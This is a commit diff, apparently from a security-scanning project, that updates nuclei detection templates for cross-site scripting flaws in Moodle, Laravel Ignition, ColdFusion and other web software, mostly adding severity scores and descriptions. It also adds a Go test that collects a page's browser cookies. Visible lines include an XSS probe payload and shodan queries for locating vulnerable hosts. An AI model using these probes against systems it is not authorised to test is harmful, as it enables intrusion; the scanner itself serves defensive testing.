    1 1  id: eclipse-help-system-xss
    2 2   
    3 3  info:
    4  - name: Eclipse Help System Cross-Site Scripting
     4 + name: IBM Eclipse Help System - Cross-Site Scripting
    5 5   author: pikpikcu
    6  - severity: medium
     6 + severity: high
     7 + description: IBM Eclipse Help System 6.1.0 through 6.1.0.6, 6.1.5 through 6.1.5.3, 7.0 through 7.0.0.2, and 8.0 prior to 8.0.0.1 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.
     8 + reference: https://packetstormsecurity.com/files/131924/IBM-Eclipse-Help-System-IEHS-Cross-Site-Scripting.html
     9 + classification:
     10 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     11 + cvss-score: 7.2
     12 + cwe-id: CWE-79
    7 13   tags: ibm,xss
    8 14   
    9 15  requests:
    skipped 14 lines
    24 30   - "text/html"
    25 31   part: header
    26 32   
     33 +# Enhanced by md on 2022/09/19
     34 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/laravel/laravel-ignition-xss.yaml
    1 1  id: laravel-ignition-xss
    2 2   
    3 3  info:
    4  - name: Laravel Ignition Cross-Site Scripting
     4 + name: Laravel Ignition - Cross-Site Scripting
    5 5   author: 0x_Akoko
    6  - severity: medium
     6 + severity: high
    7 7   description: |
    8  - Laravel's Ignition contains a cross-site scripting vulnerability when debug mode is enabled.
     8 + Laravel Ignition contains a cross-site scripting vulnerability when debug mode is enabled.
    9 9   remediation: |
    10  - Disable Laravel's debug mode by setting APP_DEBUG to false.
     10 + Disable debug mode by setting APP_DEBUG to false.
    11 11   reference:
    12 12   - https://www.acunetix.com/vulnerabilities/web/laravel-ignition-reflected-cross-site-scripting/
    13 13   - https://github.com/facade/ignition/issues/273
     14 + classification:
     15 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     16 + cvss-score: 7.2
     17 + cwe-id: CWE-79
    14 18   tags: laravel,xss,ignition
    15 19   
    16 20  requests:
    skipped 17 lines
    34 38   status:
    35 39   - 500
    36 40   
     41 +# Enhanced by md on 2022/09/19
     42 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml
    1 1  id: moodle-filter-jmol-xss
    2 2   
    3 3  info:
    4  - name: Moodle filter_jmol - Cross-Site Scripting
     4 + name: Moodle Jsmol - Cross-Site Scripting
    5 5   author: madrobot
    6 6   severity: medium
    7  - description: Cross-site scripting on Moodle.
     7 + description: Moodle contains a cross-site scripting vulnerability via the Jsmol plugin and may also be susceptible to local file inclusion or server-side-request forgery. An attacker can execute arbitrary script in the browser of an unsuspecting user and steal cookie-based authentication credentials and launch other attacks.
    8 8   reference:
    9 9   - https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/
     10 + classification:
     11 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     12 + cvss-score: 7.2
     13 + cwe-id: CWE-79
    10 14   tags: moodle,xss
    11 15   
    12 16  requests:
    skipped 17 lines
    30 34   words:
    31 35   - "text/html"
    32 36   
     37 +# Enhanced by md on 2022/09/19
     38 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/moodle/moodle-xss.yaml
    1 1  id: moodle-xss
    2 2   
    3 3  info:
    4  - name: Moodle redirect_uri - Cross-Site Scripting
     4 + name: Moodle - Cross-Site Scripting
    5 5   author: hackergautam
    6 6   severity: medium
    7  - description: XSS in moodle via redirect_uri parameter
     7 + description: Moodle 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, and earlier unsupported versions contain a cross-site scripting vulnerability via the redirect_uri parameter.
    8 8   reference:
    9 9   - https://twitter.com/JacksonHHax/status/1391367064154042377
     10 + - https://nvd.nist.gov/vuln/detail/CVE-2021-32478
     11 + classification:
     12 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     13 + cvss-score: 7.2
     14 + cwe-id: CWE-79
    10 15   tags: moodle,xss
    11 16   
    12 17  requests:
    skipped 19 lines
    32 37   words:
    33 38   - "text/html"
    34 39   
     40 +# Enhanced by md on 2022/09/19
     41 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/netsweeper/netsweeper-rxss.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: Netsweeper 4.0.9 - Cross-Site Scripting
    5 5   author: daffainfo
    6  - severity: medium
     6 + severity: high
     7 + description: Netsweeper 4.0.9 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
    7 8   reference:
    8 9   - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
    9  - tags: xss,packetstorm,netsweeper
     10 + - https://www.exploit-db.com/exploits/37930
     11 + classification:
     12 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     13 + cvss-score: 7.2
     14 + cwe-id: CWE-79
     15 + tags: edb,xss,packetstorm,netsweeper
    10 16   
    11 17  requests:
    12 18   - method: GET
    skipped 16 lines
    29 35   status:
    30 36   - 200
    31 37   
     38 +# Enhanced by md on 2022/09/19
     39 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/oracle/oracle-ebs-xss.yaml
    1 1  id: oracle-ebs-xss
    2 2   
    3 3  info:
    4  - name: Oracle EBS - Cross-Site Scripting
     4 + name: Oracle E-Business Suite - Cross-Site Scripting
    5 5   author: dhiyaneshDk
    6 6   severity: medium
    7 7   reference:
    8  - - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
    9 8   - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
    10 9   - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
    11 10   tags: oracle,xss,ebs
    skipped 20 lines
    32 31   - "text/html"
    33 32   part: header
    34 33   
     34 +# Enhanced by md on 2022/09/19
     35 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/avada-xss.yaml
    1 1  id: avada-xss
    2 2   
    3 3  info:
    4  - name: Avada < 7.4.2 - Cross-Site Scripting
     4 + name: WordPress Avada Website Builder <7.4.2 - Cross-Site Scripting
    5 5   author: Akincibor
    6  - severity: medium
    7  - description: The theme does not properly escape bbPress searches before outputting them back as breadcrumbs, leading to a Reflected Cross-Site Scripting issue.
     6 + severity: high
     7 + description: WordPress Avada Website Builder prior to 7.4.2 contains a cross-site scripting vulnerability. The theme does not properly escape bbPress searches before outputting them back as breadcrumbs.
    8 8   reference:
    9 9   - https://wpscan.com/vulnerability/eb172b07-56ab-41ce-92a1-be38bab567cb
    10 10   - https://theme-fusion.com/documentation/avada/installation-maintenance/avada-changelog/
     11 + classification:
     12 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     13 + cvss-score: 7.2
     14 + cwe-id: CWE-79
    11 15   tags: xss,wp,wordpress,wp-theme,avada,wpscan
    12 16   
    13 17  requests:
    skipped 19 lines
    33 37   status:
    34 38   - 200
    35 39   
     40 +# Enhanced by md on 2022/09/19
     41 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/carrental-xss.yaml
    1 1  id: carrental-xss
    2 2   
    3 3  info:
    4  - name: Car Rental Management System v1.0 - Stored Cross-Site Scripting
     4 + name: Car Rental Management System 1.0 - Cross-Site Scripting
    5 5   author: arafatansari
    6 6   severity: medium
    7 7   description: |
    8  - Car Rental Management System v1.0 is vulnerable to Cross Site Scripting via admin/ajax.php?action=save_category in Name and Description Parameter.
     8 + Car Rental Management System 1.0 contains a cross-site scripting vulnerability via admin/ajax.php?action=save_category in Name and Description parameter.
    9 9   reference:
    10 10   - https://www.exploit-db.com/exploits/49546
    11 11   - https://www.sourcecodester.com/
     12 + classification:
     13 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     14 + cvss-score: 7.2
     15 + cwe-id: CWE-79
    12 16   metadata:
    13 17   verified: true
    14 18   shodan-query: http.html:"Car Rental Management System"
    skipped 15 lines
    30 34   
    31 35   ------WebKitFormBoundaryCMJ5bh3B6m9767Em
    32 36   Content-Disposition: form-data; name="id"
    33  - 
    34 37   
    35 38   ------WebKitFormBoundaryCMJ5bh3B6m9767Em
    36 39   Content-Disposition: form-data; name="name"
    skipped 28 lines
    65 68   status:
    66 69   - 200
    67 70   
     71 +# Enhanced by md on 2022/09/19
     72 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/ckan-dom-based-xss.yaml
    1 1  id: ckan-dom-based-xss
    2 2   
    3 3  info:
    4  - name: CKAN DOM Based Cross-Site Scripting
     4 + name: Ckan - DOM Cross-Site Scripting
    5 5   author: dhiyaneshDk
    6  - severity: medium
    7  - description: CKAN uses the old jQuery Sparkle library which is vulnerable to DOM Based XSS.
     6 + severity: high
     7 + description: Ckan contains a cross-site scripting vulnerability in the document object model via the previous version of the jQuery Sparkle library. An attacker can execute arbitrary script and thus can steal cookie-based authentication credentials and launch other attacks.
    8 8   reference:
    9 9   - https://github.com/ckan/ckan/blob/b9e45e2723d4abd70fa72b16ec4a0bebc795c56b/ckan/public/base/javascript/view-filters.js#L27
     10 + - https://security.snyk.io/vuln/SNYK-PYTHON-CKAN-42010
     11 + classification:
     12 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     13 + cvss-score: 7.2
     14 + cwe-id: CWE-79
    10 15   tags: dom,xss
    11 16   
    12 17  requests:
    skipped 16 lines
    29 34   - 'text/html'
    30 35   part: header
    31 36   
     37 +# Enhanced by md on 2022/09/20
     38 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/coldfusion-debug-xss.yaml
    1 1  id: coldfusion-debug-xss
    2 2   
    3 3  info:
    4  - name: Adobe ColdFusion Debug Page Cross-Site Scripting
     4 + name: Adobe ColdFusion - Cross-Site Scripting
    5 5   author: dhiyaneshDK
    6  - severity: medium
    7  - description: The remote Adobe ColdFusion debug page has been left open to unauthenticated users, this could allow remote attackers to trigger a reflected cross site scripting against the visitors of the site.
     6 + severity: high
     7 + description: Adobe ColdFusion debug page contains a cross-site scripting vulnerability when the application is running on a remote host. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
    8 8   reference:
    9 9   - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml
     10 + classification:
     11 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     12 + cvss-score: 7.2
     13 + cwe-id: CWE-79
    10 14   metadata:
    11 15   shodan-query: http.component:"Adobe ColdFusion"
    12 16   tags: adobe,coldfusion,xss
    skipped 20 lines
    33 37   status:
    34 38   - 200
    35 39   
     40 +# Enhanced by md on 2022/09/20
     41 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/devalcms-xss.yaml
    1  -id: devalcms-xss
     1 +id: CVE-2008-6982
    2 2   
    3 3  info:
    4  - name: Devalcms 1.4A - Cross-Site Scripting
     4 + name: Devalcms 1.4a - Cross-Site Scripting
    5 5   author: arafatansari
    6  - severity: medium
     6 + severity: high
    7 7   description: |
    8  - Devalcms 1.4A is affected by Cross-Site Scripting (rXSS) in the 'currentpath' parameter of the index.php file.
     8 + Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.
    9 9   reference:
    10 10   - https://www.exploit-db.com/exploits/6369
     11 + - https://www.cvedetails.com/cve/CVE-2008-6982
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2008-6982
     13 + - http://sourceforge.net/projects/devalcms/files/devalcms/devalcms-1.4b/devalcms-1.4b.zip/download
     14 + classification:
     15 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     16 + cvss-score: 7.2
     17 + cwe-id: CWE-79
    11 18   metadata:
    12  - verified: true
     19 + verified: "true"
    13 20   tags: devalcms,xss,cms,edb
    14 21   
    15 22  requests:
    skipped 17 lines
    33 40   status:
    34 41   - 500
    35 42   
     43 +# Enhanced by md on 2022/09/20
     44 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/discourse-xss.yaml
    1 1  id: discourse-xss
    2 2   
    3 3  info:
    4  - name: Discourse CMS - Cross-Site Scripting
     4 + name: Discourse - Cross-Site Scripting
    5 5   author: madrobot
    6  - severity: medium
    7  - description: Cross-site scripting (XSS) on Discourse CMS
     6 + severity: high
     7 + description: Discourse contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
     8 + reference:
     9 + - https://www.cvedetails.com/vulnerability-list/vendor_id-20185/product_id-57316/opxss-1/Discourse-Discourse.html
     10 + - https://github.com/discourse/discourse/security/advisories/GHSA-xhmc-9jwm-wqph
     11 + classification:
     12 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     13 + cvss-score: 7.2
     14 + cwe-id: CWE-79
    8 15   tags: xss,discourse
    9 16   
    10 17  requests:
    skipped 16 lines
    27 34   - "text/html"
    28 35   part: header
    29 36   
     37 +# Enhanced by md on 2022/09/20
     38 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/dzzoffice-xss.yaml
    1 1  id: dzzoffice-xss
    2 2   
    3 3  info:
    4  - name: Dzzoffice 2.02.1_SC_UTF8 - Cross-Site Scripting
     4 + name: Dzzoffice 2.02.1 - Cross-Site Scripting
    5 5   author: arafatansari
    6  - severity: medium
     6 + severity: high
    7 7   description: |
    8  - A XSS vulnerability was discovered in dzzoffice 2.02.1_SC_UTF8, There is a Reflected XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the zero parameter.
     8 + Dzzoffice 2.02.1_SC_UTF8 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the zero parameter.
    9 9   reference:
    10 10   - https://github.com/zyx0814/dzzoffice/issues/183
     11 + classification:
     12 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     13 + cvss-score: 7.2
     14 + cwe-id: CWE-79
    11 15   metadata:
    12 16   verified: true
    13 17   shodan-query: http.html:"dzzoffice"
    skipped 23 lines
    37 41   status:
    38 42   - 200
    39 43   
     44 +# Enhanced by md on 2022/09/20
     45 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/empirecms-xss.yaml
    1 1  id: empirecms-xss
    2 2   
    3 3  info:
    4  - name: EmpireCMS v75 Cross-Site Scripting
     4 + name: EmpireCMS 7.5 - Cross-Site Scripting
    5 5   author: pikpikcu
    6  - severity: medium
     6 + severity: high
     7 + description: EmpireCMS 7.5 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
    7 8   reference:
    8 9   - https://www.geek-share.com/detail/2777280260.html
     10 + - https://github.com/leadscloud/EmpireCMS/issues/4
     11 + classification:
     12 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     13 + cvss-score: 7.2
     14 + cwe-id: CWE-79
    9 15   tags: empirecms,xss
    10 16   
    11 17  requests:
    skipped 12 lines
    24 30   status:
    25 31   - 200
    26 32   
     33 +# Enhanced by md on 2022/09/20
     34 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/eris-xss.yaml
    1 1  id: eris-xss
    2 2   
    3 3  info:
    4  - name: Complete Online Job Search System v1.0 - Cross-Site Scripting
     4 + name: Complete Online Job Search System 1.0 - Cross-Site Scripting
    5 5   author: arafatansari
    6  - severity: medium
     6 + severity: high
    7 7   description: |
    8  - Complete Online Job Search System v1.0 is vulnerable to Reflected Cross Site Scripting via index.php?q=advancesearch.
     8 + Complete Online Job Search System 1.0 contains a cross-site scripting vulnerability via index.php?q=advancesearch.
     9 + reference:
     10 + - https://github.com/debug601/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-9.md
     11 + classification:
     12 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     13 + cvss-score: 7.2
     14 + cwe-id: CWE-79
    9 15   metadata:
    10 16   verified: true
    11 17   tags: cve,cve2022,xss,eris
    skipped 25 lines
    37 43   status:
    38 44   - 200
    39 45   
     46 +# Enhanced by md on 2022/09/20
     47 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/hospital-management-xss.yaml
    1 1  id: hospital-management-xss
    2 2   
    3 3  info:
    4  - name: Hospital Management System v1.0 - Cross Site Scripting
     4 + name: Hospital Management System 1.0 - Cross-Site Scripting
    5 5   author: arafatansari
    6  - severity: medium
     6 + severity: high
    7 7   description: |
    8  - Hospital Management System v1.0 was discovered to contain a XSS vulnerability via the searchdata parameter in doctor/search.php.
     8 + Hospital Management System 1.0 contains a cross-site scripting vulnerability via the searchdata parameter in doctor/search.php.
     9 + reference:
     10 + - https://vulmon.com/vulnerabilitydetails?qid=CVE-2021-39411&scoretype=cvssv3
     11 + classification:
     12 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     13 + cvss-score: 7.2
     14 + cwe-id: CWE-79
    9 15   metadata:
    10 16   verified: true
    11 17   shodan-query: http.html:"Hospital Management System"
    skipped 26 lines
    38 44   - contains(body_2, 'Result against \"<script>alert(document.domain)</script>\" keyword')
    39 45   condition: and
    40 46   
     47 +# Enhanced by md on 2022/09/20
     48 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/hospital-management-xss2.yaml
    1 1  id: hospital-management-xss2
    2 2   
    3 3  info:
    4  - name: Hospital Management System v1.0 - Cross Site Scripting
     4 + name: Hospital Management System 1.0 - Cross-Site Scripting
    5 5   author: arafatansari
    6  - severity: medium
     6 + severity: high
    7 7   description: |
    8  - Hospital Management System v1.0 was discovered to contain a XSS vulnerability via the searchdata parameter in patient-search.php.
     8 + Hospital Management System 1.0 contains a cross-site scripting vulnerability via the searchdata parameter in patient-search.php.
     9 + reference:
     10 + - https://vulmon.com/vulnerabilitydetails?qid=CVE-2021-39411&scoretype=cvssv3
     11 + classification:
     12 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     13 + cvss-score: 7.2
     14 + cwe-id: CWE-79
    9 15   metadata:
    10 16   verified: true
    11 17   shodan-query: http.html:"Hospital Management System"
    skipped 26 lines
    38 44   - contains(body_2, 'Result against \"<script>alert(document.domain)</script>\" keyword')
    39 45   condition: and
    40 46   
     47 +# Enhanced by md on 2022/09/20
     48 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/java-melody-xss.yaml
    1 1  id: java-melody-xss
    2 2   
    3 3  info:
    4  - name: JavaMelody Monitoring - Cross-Site Scripting
     4 + name: JavaMelody - Cross-Site Scripting
    5 5   author: kailashbohara
    6  - severity: medium
    7  - description: Reflected cross site scripting (XSS) in JavaMelody monitoring.
     6 + severity: high
     7 + description: JavaMelody contains a cross-site scripting vulnerability via the monitoring parameter. An attacker can execute arbitrary script in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
    8 8   reference:
    9 9   - https://github.com/Hurdano/JavaMelody-XSS
    10 10   - https://github.com/javamelody/javamelody/pull/555
     11 + classification:
     12 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     13 + cvss-score: 7.2
     14 + cwe-id: CWE-79
    11 15   tags: xss,javamelody
    12 16   
    13 17  requests:
    skipped 16 lines
    30 34   status:
    31 35   - 200
    32 36   
     37 +# Enhanced by md on 2022/09/20
     38 + 
  • ■ ■ ■ ■ ■ ■
    spider/chromedp_test.go
     1 +package spider
     2 + 
     3 +import (
     4 + "context"
     5 + "fmt"
     6 + "github.com/chromedp/cdproto/network"
     7 + "log"
     8 + "testing"
     9 + "time"
     10 + 
     11 + "github.com/chromedp/chromedp"
     12 +)
     13 + 
     14 +// https://github.com/chromedp/examples
     15 +func Test_Name(t *testing.T) {
     16 + // create chrome instance
     17 + ctx, cancel := chromedp.NewContext(
     18 + context.Background(),
     19 + chromedp.WithLogf(log.Printf),
     20 + )
     21 + defer cancel()
     22 + 
     23 + // create a timeout
     24 + ctx, cancel = context.WithTimeout(ctx, 15*time.Second)
     25 + defer cancel()
     26 + 
     27 + // navigate to a page, wait for an element, click
     28 + var example string
     29 + err := chromedp.Run(ctx,
     30 + chromedp.Navigate(`https://www.baidu.com/`),
     31 + // // wait for footer element is visible (ie, page is loaded)
     32 + chromedp.WaitVisible(`body`),
     33 + // // find and click "Expand All" link
     34 + // chromedp.Click(`#pkg-examples > div`, chromedp.NodeVisible),
     35 + // // retrieve the value of the textarea
     36 + // chromedp.Value(`document.cookies`, &example),
     37 + chromedp.ActionFunc(func(ctx context.Context) error {
     38 + cookies, err := network.GetAllCookies().Do(ctx)
     39 + if err != nil {
     40 + return err
     41 + }
     42 + for _, cookie := range cookies {
     43 + example += fmt.Sprintf("%v", cookie) + ";"
     44 + }
     45 + return nil
     46 + }),
     47 + )
     48 + if err != nil {
     49 + log.Fatal(err)
     50 + }
     51 + fmt.Printf("Go's time.After example:\n%s", example)
     52 +}
     53 + 
Please wait...
Page is in error, reload to recover